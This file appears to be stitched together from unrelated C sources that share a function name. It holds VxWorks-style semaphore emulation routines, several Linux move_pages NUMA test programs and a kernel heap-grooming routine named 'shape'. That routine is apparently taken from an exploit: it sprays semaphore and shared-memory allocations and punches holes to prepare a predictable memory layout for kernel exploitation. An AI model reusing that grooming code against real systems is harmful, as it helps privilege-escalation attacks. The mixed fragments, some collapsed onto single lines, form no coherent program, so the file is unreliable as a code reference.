static SEM_ID alloc_xsem(int options, int initval, int maxval) { int sobj_flags = 0, ret; struct wind_sem *sem; if (options & ~SEM_Q_PRIORITY) { errno = S_semLib_INVALID_OPTION; return (SEM_ID)0; } sem = alloc_sem(options, &xsem_ops); if (sem == NULL) { errno = S_memLib_NOT_ENOUGH_MEMORY; return (SEM_ID)0; } if (options & SEM_Q_PRIORITY) sobj_flags = SYNCOBJ_PRIO; sem->u.xsem.value = initval; sem->u.xsem.maxvalue = maxval; ret = syncobj_init(&sem->u.xsem.sobj, CLOCK_COPPERPLATE, sobj_flags, fnref_put(libvxworks, sem_finalize)); if (ret) { xnfree(sem); errno = S_memLib_NOT_ENOUGH_MEMORY; return (SEM_ID)0; } return mainheap_ref(sem, SEM_ID); }
/*
 * Test entry point: after forking a child that shares pages with the
 * parent, call move_pages() with MPOL_MF_MOVE and check that the status
 * entry for the shared page is set to -EACCES (shared pages may not be
 * moved without MPOL_MF_MOVE_ALL).
 */
int main(int argc, char **argv)
{
	const char *msg;

	msg = parse_opts(argc, argv, NULL, NULL);
	if (msg != NULL) {
		/* tst_brkm() reports TBROK and terminates the test. */
		tst_brkm(TBROK, NULL, "OPTION PARSING ERROR - %s", msg);
	}

	setup();

#if HAVE_NUMA_MOVE_PAGES
	unsigned int i;
	int lc;
	unsigned int from_node;
	unsigned int to_node;
	int ret;

	/* Need two NUMA nodes with memory to migrate between. */
	ret = get_allowed_nodes(NH_MEMS, 2, &from_node, &to_node);
	if (ret < 0)
		tst_brkm(TBROK | TERRNO, cleanup, "get_allowed_nodes: %d",
			 ret);

	/* check for looping state if -i option is given */
	for (lc = 0; TEST_LOOPING(lc); lc++) {
		void *pages[N_TEST_PAGES] = { 0 };
		int nodes[N_TEST_PAGES];
		int status[N_TEST_PAGES];
		pid_t cpid;
		sem_t *sem;

		/* reset tst_count in case we are looping */
		tst_count = 0;

		/* Shared pages go at index SHARED_PAGE ... */
		ret = alloc_shared_pages_on_node(pages + SHARED_PAGE,
						 N_SHARED_PAGES, from_node);
		if (ret == -1)
			continue;

		/* ... private pages at index UNSHARED_PAGE. */
		ret = alloc_pages_on_node(pages + UNSHARED_PAGE,
					  N_UNSHARED_PAGES, from_node);
		if (ret == -1)
			goto err_free_shared;

		/* Request migration of every page to the target node. */
		for (i = 0; i < N_TEST_PAGES; i++) {
			nodes[i] = to_node;
		}

		sem = alloc_sem(MAX_SEMS);
		if (sem == NULL) {
			goto err_free_unshared;
		}

		/*
		 * Fork a child process so that the shared pages are
		 * now really shared between two processes.
		 */
		cpid = fork();
		if (cpid == -1) {
			tst_resm(TBROK, "forking child failed");
			goto err_free_sem;
		} else if (cpid == 0) {
			/* child() does not return to this flow. */
			child(pages, sem);
		}

		/* Wait for child to setup and signal. */
		if (sem_wait(&sem[SEM_CHILD_SETUP]) == -1)
			tst_resm(TWARN | TERRNO, "error wait semaphore");

		/* MPOL_MF_MOVE only: shared pages must be refused. */
		ret = numa_move_pages(0, N_TEST_PAGES, pages, nodes,
				      status, MPOL_MF_MOVE);
		if (ret == -1) {
			tst_resm(TFAIL | TERRNO,
				 "move_pages unexpectedly failed");
			goto err_kill_child;
		}

		/* Per-page status for the shared page must be -EACCES. */
		if (status[SHARED_PAGE] == -EACCES)
			tst_resm(TPASS, "status[%d] set to expected -EACCES",
				 SHARED_PAGE);
		else
			tst_resm(TFAIL, "status[%d] is %d", SHARED_PAGE,
				 status[SHARED_PAGE]);

err_kill_child:
		/* Test done. Ask child to terminate. */
		if (sem_post(&sem[SEM_PARENT_TEST]) == -1)
			tst_resm(TWARN | TERRNO, "error post semaphore");
		/* Read the status, no zombies! */
		wait(NULL);
err_free_sem:
		free_sem(sem, MAX_SEMS);
err_free_unshared:
		free_pages(pages + UNSHARED_PAGE, N_UNSHARED_PAGES);
err_free_shared:
		free_shared_pages(pages + SHARED_PAGE, N_SHARED_PAGES);
	}
#else
	tst_resm(TCONF, "move_pages support not found.");
#endif

	cleanup();
	tst_exit();
}
int main(int argc, char **argv) { char *msg; /* message returned from parse_opts */ /* parse standard options */ msg = parse_opts(argc, argv, NULL, NULL); if (msg != NULL) { tst_brkm(TBROK, NULL, "OPTION PARSING ERROR - %s", msg); tst_exit(); } setup(); #if HAVE_NUMA_MOVE_PAGES unsigned int i; int lc; /* loop counter */ unsigned int from_node; unsigned int to_node; int ret; ret = get_allowed_nodes(NH_MEMS, 2, &from_node, &to_node); if (ret < 0) tst_brkm(TBROK|TERRNO, cleanup, "get_allowed_nodes: %d", ret); /* check for looping state if -i option is given */ for (lc = 0; TEST_LOOPING(lc); lc++) { void *pages[TEST_PAGES] = { 0 }; int nodes[TEST_PAGES]; int status[TEST_PAGES]; pid_t cpid; sem_t *sem; /* reset Tst_count in case we are looping */ Tst_count = 0; ret = alloc_shared_pages_on_node(pages, TEST_PAGES, from_node); if (ret == -1) continue; for (i = 0; i < TEST_PAGES; i++) { nodes[i] = to_node; } sem = alloc_sem(MAX_SEMS); if (sem == NULL) { goto err_free_pages; } /* * Fork a child process so that the shared pages are * now really shared between two processes. */ cpid = fork(); if (cpid == -1) { tst_resm(TBROK, "forking child failed: %s", strerror(errno)); goto err_free_sem; } else if (cpid == 0) { child(pages, sem); } /* Wait for child to setup and signal. */ if (sem_wait(&sem[SEM_CHILD_SETUP]) == -1) tst_resm(TWARN, "error wait semaphore: %s", strerror(errno)); ret = numa_move_pages(0, TEST_PAGES, pages, nodes, status, MPOL_MF_MOVE_ALL); TEST_ERRNO = errno; if (ret == -1 && errno == EPERM) tst_resm(TPASS, "move_pages failed with " "EPERM as expected"); else tst_resm(TFAIL, "move_pages did not fail " "with EPERM"); /* Test done. Ask child to terminate. */ if (sem_post(&sem[SEM_PARENT_TEST]) == -1) tst_resm(TWARN, "error post semaphore: %s", strerror(errno)); /* Read the status, no zombies! 
*/ wait(NULL); err_free_sem: free_sem(sem, MAX_SEMS); err_free_pages: free_shared_pages(pages, TEST_PAGES); } #else tst_resm(TCONF, "move_pages support not found."); #endif cleanup(); tst_exit(); }
/*
 * Groom the kernel heap into a predictable layout: punch holes before a
 * "workspace" region, have a child fill the workspace, interleave
 * sem/shm allocations after it, then free the prepared holes.
 *
 * @spray_size: out-parameter; receives the byte size of one spray unit
 *              as reported by spray(1).
 *
 * Returns 0 on success, 1 on setup failure (socketpair or spray error).
 *
 * Fix: removed the unused locals `int exec[2]` and `struct flock fl`
 * (and its dead memset), and simplified the no-op `bytes / 1` division.
 */
int shape(size_t *spray_size)
{
	size_t keys[0x400];
	int sv[2];
	char flag;
	size_t bytes = 0, tofree = 0;
	size_t factor, hole_size;
	pid_t pid, wpid;
	int status;

	/* Socketpair used only to synchronize parent and child phases. */
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
		printf("[*err] socketpair failed\n");
		return 1;
	}

	/* Probe one spray unit; (size_t)-1 signals failure (needs root). */
	bytes = spray(1);
	if (bytes == (size_t)-1) {
		printf("[*err*] bytes < 0, are you root?\n");
		return 1;
	}
	*spray_size = bytes;

	hole_size = get_size_factor(*spray_size, &factor);
	/* Number of spray units needed to cover the hole region. */
	tofree = hole_size / bytes + 1;

	printf("[*] allocate holes before the workspace\n");
	/* Only this first batch is recorded so it can be freed later. */
	for (int i = 0; i < 0x400; ++i) {
		keys[i] = alloc_sem(0x7000);
	}
	for (int i = 0; i < 0x20; ++i) {
		alloc_sem(0x7000);
	}
	for (int i = 0; i < 0x2000; ++i) {
		alloc_sem(4063);
	}
	for (int i = 0; i < 0x2000; ++i) {
		alloc_sem(3);
	}

	pid = fork();
	if (pid > 0) {
		printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n");
		bytes = spray(5);
		write(sv[1], "p", 1);
		read(sv[1], &flag, 1);
	} else { // son
		read(sv[0], &flag, 1);
		printf("[*] alloc workspace pages\n");
		bytes = spray(tofree);
		printf("[*] finish allocate workspace allocations\n");
		write(sv[0], "p", 1);
	}

	if (pid > 0) {
		printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n");
		for (int i = 0; i < 0x100; ++i) {
			alloc_sem(4061);
			for (int j = 0; j < 0x5; ++j) {
				alloc_shm(i * 0x100 + j);
			}
		}
		write(sv[1], "p", 1);
	} else {
		read(sv[0], &flag, 1);
		printf("[*] free middle allocation, creating workspace freed\n");
		/* Child exit releases its allocations -> freed workspace. */
		exit(1);
	}

	/* Reap the child; avoid zombies. */
	while ((wpid = wait(&status)) > 0);

	printf("[*] free prepared holes, create little pages holes before the workspace\n");
	for (int i = 0; i < 0x400; ++i) {
		free_sem(keys[i]);
	}

	return 0;
}
/*
 * Test entry point: fork a child sharing pages with the parent, migrate
 * all pages with MPOL_MF_MOVE_ALL, and verify via verify_pages_on_node()
 * that the pages ended up on the target node.
 */
int main(int argc, char **argv)
{
	tst_parse_opts(argc, argv, NULL, NULL);

	setup();

#ifdef HAVE_NUMA_V2
	unsigned int i;
	int lc;
	unsigned int from_node;
	unsigned int to_node;
	int ret;

	/* Need two NUMA nodes with memory to migrate between. */
	ret = get_allowed_nodes(NH_MEMS, 2, &from_node, &to_node);
	if (ret < 0)
		tst_brkm(TBROK | TERRNO, cleanup, "get_allowed_nodes: %d",
			 ret);

	/* check for looping state if -i option is given */
	for (lc = 0; TEST_LOOPING(lc); lc++) {
		void *pages[TEST_PAGES] = { 0 };
		int nodes[TEST_PAGES];
		int status[TEST_PAGES];
		pid_t cpid;
		sem_t *sem;

		/* reset tst_count in case we are looping */
		tst_count = 0;

		ret = alloc_shared_pages_on_node(pages, TEST_PAGES,
						 from_node);
		if (ret == -1)
			continue;

		/* Request migration of every page to the target node. */
		for (i = 0; i < TEST_PAGES; i++) {
			nodes[i] = to_node;
		}

		sem = alloc_sem(MAX_SEMS);
		if (sem == NULL) {
			goto err_free_pages;
		}

		/*
		 * Fork a child process so that the shared pages are
		 * now really shared between two processes.
		 */
		cpid = fork();
		if (cpid == -1) {
			tst_resm(TBROK | TERRNO, "forking child failed");
			goto err_free_sem;
		} else if (cpid == 0) {
			/* child() does not return to this flow. */
			child(pages, sem);
		}

		/* Wait for child to setup and signal. */
		if (sem_wait(&sem[SEM_CHILD_SETUP]) == -1)
			tst_resm(TWARN | TERRNO, "error wait semaphore");

		ret = numa_move_pages(0, TEST_PAGES, pages, nodes,
				      status, MPOL_MF_MOVE_ALL);
		if (ret < 0) {
			tst_resm(TFAIL|TERRNO, "move_pages failed");
			goto err_kill_child;
		} else if (ret > 0) {
			/* ret > 0: number of pages not moved. */
			tst_resm(TINFO, "move_pages() returned %d\n", ret);
		}

		verify_pages_on_node(pages, status, TEST_PAGES, to_node);

err_kill_child:
		/* Test done. Ask child to terminate. */
		if (sem_post(&sem[SEM_PARENT_TEST]) == -1)
			tst_resm(TWARN | TERRNO, "error post semaphore");
		/* Read the status, no zombies! */
		wait(NULL);
err_free_sem:
		free_sem(sem, MAX_SEMS);
err_free_pages:
		free_shared_pages(pages, TEST_PAGES);
	}
#else
	tst_resm(TCONF, NUMA_ERROR_MSG);
#endif

	cleanup();
	tst_exit();
}
/*
 * semMCreate - create a VxWorks mutex-kind semaphore, emulated with a
 * recursive POSIX mutex.
 *
 * @options: any of SEM_Q_PRIORITY | SEM_DELETE_SAFE | SEM_INVERSION_SAFE;
 *           SEM_INVERSION_SAFE requires SEM_Q_PRIORITY.
 *
 * Returns a SEM_ID heap reference on success, (SEM_ID)0 with errno set
 * on failure.
 */
SEM_ID semMCreate(int options)
{
	pthread_mutexattr_t mattr;
	struct wind_sem *sem;
	struct service svc;

	if (options & ~(SEM_Q_PRIORITY|SEM_DELETE_SAFE|SEM_INVERSION_SAFE)) {
		errno = S_semLib_INVALID_OPTION;
		return (SEM_ID)0;
	}

	/* Priority inheritance only makes sense with priority queuing. */
	if ((options & SEM_Q_PRIORITY) == 0) {
		if (options & SEM_INVERSION_SAFE) {
			errno = S_semLib_INVALID_QUEUE_TYPE;	/* C'mon... */
			return (SEM_ID)0;
		}
	}

	CANCEL_DEFER(svc);

	sem = alloc_sem(options, &msem_ops);
	if (sem == NULL) {
		errno = S_memLib_NOT_ENOUGH_MEMORY;
		CANCEL_RESTORE(svc);
		return (SEM_ID)0;
	}

	/*
	 * XXX: POSIX-wise, we have a few issues with emulating
	 * VxWorks semaphores of the mutex kind.
	 *
	 * VxWorks flushes any kind of semaphore upon deletion
	 * (however, explicit semFlush() is not allowed on the mutex
	 * kind though); but POSIX doesn't implement such mechanism on
	 * its mutex object. At the same time, we need priority
	 * inheritance when SEM_INVERSION_SAFE is passed, so we can't
	 * emulate VxWorks mutex semaphores using condvars. Since the
	 * only way to get priority inheritance is to use a POSIX
	 * mutex, we choose not to emulate flushing in semDelete(),
	 * but keep inversion-safe locking possible.
	 *
	 * The same way, we don't support FIFO ordering for mutexes,
	 * since this would require to handle them as recursive binary
	 * semaphores with ownership, for no obvious upside.
	 * Logically speaking, relying on recursion without any
	 * consideration for priority while serializing threads is
	 * just asking for troubles anyway.
	 */
	pthread_mutexattr_init(&mattr);
	pthread_mutexattr_settype(&mattr, PTHREAD_MUTEX_RECURSIVE);
	/* pthread_mutexattr_setrobust_np() might not be implemented. */
	pthread_mutexattr_setrobust_np(&mattr, PTHREAD_MUTEX_ROBUST_NP);
	if (options & SEM_INVERSION_SAFE)
		pthread_mutexattr_setprotocol(&mattr, PTHREAD_PRIO_INHERIT);
	pthread_mutexattr_setpshared(&mattr, mutex_scope_attribute);
	__RT(pthread_mutex_init(&sem->u.msem.lock, &mattr));
	pthread_mutexattr_destroy(&mattr);

	CANCEL_RESTORE(svc);

	return mainheap_ref(sem, SEM_ID);
}